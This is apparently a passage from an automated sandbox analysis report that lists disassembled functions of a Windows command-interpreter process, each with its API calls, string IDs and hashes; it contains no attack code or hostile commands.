                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD489362
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7CD489373
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                        • String ID:
                                        • API String ID: 3966000956-0
                                        • Opcode ID: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                        • Instruction ID: 374c6fce4d50a13945120bce4af84be697270f4336a440b4e606d9a778aa8e27
                                        • Opcode Fuzzy Hash: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                        • Instruction Fuzzy Hash: F751A132B0DA8286EB61AF11D8506B9B3A5FB49BA4F844035DF2D47B95EF3CE651C310
                                        Function 00007FF7CD482A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$_setjmp
                                        • String ID:
                                        • API String ID: 3883041866-0
                                        • Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                        • Instruction ID: 65374a5faea3d53b147426f37c97d3e50fa5b4fa4847c500818b607f916edf65
                                        • Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                        • Instruction Fuzzy Hash: 8D514F3270CB868AEB619F21D8803EAB7A4EB45798F804135DB5D87A49EF3CD744CB10
                                        Function 00007FF7CD48B49C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 106COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcsicmp.MSVCRT ref: 00007FF7CD48B4BD
                                          • Part of subcall function 00007FF7CD4906C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD4906D6
                                          • Part of subcall function 00007FF7CD4906C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD4906F0
                                          • Part of subcall function 00007FF7CD4906C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD49074D
                                          • Part of subcall function 00007FF7CD4906C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD490762
                                        • _wcsicmp.MSVCRT ref: 00007FF7CD48B518
                                        • _wcsicmp.MSVCRT ref: 00007FF7CD48B58B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$_wcsicmp$AllocProcess
                                        • String ID: ELSE$IF/?
                                        • API String ID: 3223794493-1134991328
                                        • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                        • Instruction ID: 1c540f12ab7dc36d9d5a6dcfe4e48dd8b3e639f002752fc8a6a3819f5f34696e
                                        • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                        • Instruction Fuzzy Hash: 5F415C31F0D64386FA54BF65A8152BDA661AF547A4FC85039DF2E97296FE3CE600C320
                                        Function 00007FF7CD4AE3E8 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                        • String ID:
                                        • API String ID: 1532185241-0
                                        • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                        • Instruction ID: 5f80559c1177199b52d56c3a50f565386265194c559784c2e711962143dfea77
                                        • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                        • Instruction Fuzzy Hash: EA41B432B087528BE754AF21D445A7DFAA1FB84BA0F854535EF2A43785EF3CEA418710
                                        Function 00007FF7CD484FE8 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                        • String ID:
                                        • API String ID: 3588551418-0
                                        • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                        • Instruction ID: 23e34074aa7064c0aca2384f8cb4d1bd55b98e660bdb71e76ebb344634a89764
                                        • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                        • Instruction Fuzzy Hash: DE418131B0C6428BE7247F51984427DF661EB85BA0F944039DF2E87795EF3CEA408760
                                        Function 00007FF7CD4AE558 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ErrorModememset$FullNamePath_wcsicmp
                                        • String ID:
                                        • API String ID: 2123716050-0
                                        • Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                        • Instruction ID: 9a7bec5cd8569f6ded2cb1598561de662fa46c3a069cd096dc2a2ca4466bc0e2
                                        • Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                        • Instruction Fuzzy Hash: C141A032709AC28AEB71AF21D8843E9B795EB4979CF844134DF5D4AA98EF3CD3448710
                                        Function 00007FF7CD4865F8 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                        • String ID:
                                        • API String ID: 3114114779-0
                                        • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                        • Instruction ID: 3363a0dd427c3773d072216aa55e75efe0e94476548c4508bd80cf5aa6b0851c
                                        • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                        • Instruction Fuzzy Hash: 5F416932B09B429AEB00EF65D8402ACBBA5FB88758F944035DF1D93B54EF38D606C760
                                        Function 00007FF7CD4AA73C Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7CD4A9A82), ref: 00007FF7CD4AA77A
                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7CD4A9A82), ref: 00007FF7CD4AA7AF
                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7CD4A9A82), ref: 00007FF7CD4AA80E
                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7CD4A9A82), ref: 00007FF7CD4AA839
                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7CD4A9A82), ref: 00007FF7CD4AA850
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: QueryValue$CloseErrorLastOpen
                                        • String ID:
                                        • API String ID: 2240656346-0
                                        • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                        • Instruction ID: 066c63d01d2fe2c2cee5086d5ae0e2ec87bf3d95d612d7ca3591a2dfa9e2fbd3
                                        • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                        • Instruction Fuzzy Hash: 5F318F32B1CA4196EB50AF25E48447AF7E5FB887A0F944035EF9E46764EF3CD9418B20
                                        Function 00007FF7CD4AD0C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD4901B8: _get_osfhandle.MSVCRT ref: 00007FF7CD4901C4
                                          • Part of subcall function 00007FF7CD4901B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7CD49E904,?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD4901D6
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7CD4AD0F9
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7CD4AD10F
                                        • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7CD4AD166
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7CD4AD17A
                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7CD4AD18C
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                        • String ID:
                                        • API String ID: 3008996577-0
                                        • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                        • Instruction ID: f024c570a67bb7c7bf8d89f5615791a42c71b833a468e7a7f24f4867b5dc07bf
                                        • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                        • Instruction Fuzzy Hash: 6F215E32B18A419AE700AFB1E8040BDB7B1FB5DB58B845125DF5D53B58EF38D240CB24
                                        Function 00007FF7CD4A5770 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CreateSemaphore
                                        • String ID: _p0$wil
                                        • API String ID: 1078844751-1814513734
                                        • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                        • Instruction ID: b4cc0db3d65e874c7fde4f1517ca389686f11ad99792507b1541c31b82d76bef
                                        • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                        • Instruction Fuzzy Hash: 2251F562B1D78286EE21AF5485546B9F2A4AF84BB0FD44435DF5D0B780FF3CE6058320
                                        Function 00007FF7CD4AB89C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF7CD4AB934
                                        • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7CD495085), ref: 00007FF7CD4AB9A5
                                        • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7CD495085), ref: 00007FF7CD4AB9F7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                        • String ID: %WINDOWS_COPYRIGHT%
                                        • API String ID: 1103618819-1745581171
                                        • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                        • Instruction ID: 53a2763204a78cf879f2225a584c8c71398dab5f648e5b1cb7408df31c93b5a0
                                        • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                        • Instruction Fuzzy Hash: 8B417D62B0CA8286EA10AF15D410279B7A5FB59BA0FC59235DFAD07395FF3CE681C710
                                        Function 00007FF7CD4B0774 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$_wcslwr
                                        • String ID: [%s]
                                        • API String ID: 886762496-302437576
                                        • Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                        • Instruction ID: a14f90a53ce3d1a484712293e92773b37d46f86107885d5e9bc8ca32a046bc8c
                                        • Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                        • Instruction Fuzzy Hash: 01318D32709B8295EB21EF62D8503E9A7A0FB49B98F844035DF9D47754EF3CD2458710
                                        Function 00007FF7CD4932E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD4933A8: iswspace.MSVCRT(?,?,00000000,00007FF7CD4AD6EE,?,?,?,00007FF7CD4A0632), ref: 00007FF7CD4933C0
                                        • iswspace.MSVCRT(?,?,?,00007FF7CD4932A4), ref: 00007FF7CD49331C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: iswspace
                                        • String ID: off
                                        • API String ID: 2389812497-733764931
                                        • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                        • Instruction ID: d305a1a1a0268bea4ddc89bdcc00ed2e0d549eb27ecbcc99dc7c8d3852e8bdfd
                                        • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                        • Instruction Fuzzy Hash: 9A219421B0C64291FA70AF579458679F697EF46BA0FCC8034DF6E47690FE2CE6408321
                                        Function 00007FF7CD4A9308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$Heapiswspace$AllocProcess
                                        • String ID: %s=%s$DPATH$PATH
                                        • API String ID: 3731854180-3148396303
                                        • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                        • Instruction ID: 0c634b2a07d0842a9beb0e12c8ec306ea5b35549c1795a4e1465f4671017d59c
                                        • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                        • Instruction Fuzzy Hash: 05218025B0DA5290EE54AF95E440679E3A5AF84BA4FC88135CF2E47395FF3CD6408760
                                        Function 00007FF7CD498198 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
